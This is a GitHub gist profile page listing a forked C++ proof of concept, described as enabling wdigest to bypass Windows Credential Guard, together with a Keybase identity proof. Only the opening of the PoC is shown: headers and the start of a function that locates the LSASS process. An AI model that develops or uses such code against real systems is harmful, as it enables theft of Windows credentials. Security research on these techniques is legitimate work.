Skip to content

Instantly share code, notes, and snippets.

View ArtificialAmateur's full-sized avatar

Artificial ArtificialAmateur

View GitHub Profile
@ArtificialAmateur
ArtificialAmateur / CredGuard_PoC
Created August 27, 2020 04:44 — forked from N4kedTurtle/CredGuard_PoC
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);

Keybase proof

I hereby claim:

  • I am artificialamateur on github.
  • I am artificial (https://keybase.io/artificial) on keybase.
  • I have a public key whose fingerprint is 826E 3A1C 33C8 C52A 8409 1B17 D789 816E 2975 A566

To claim this, I am signing this object: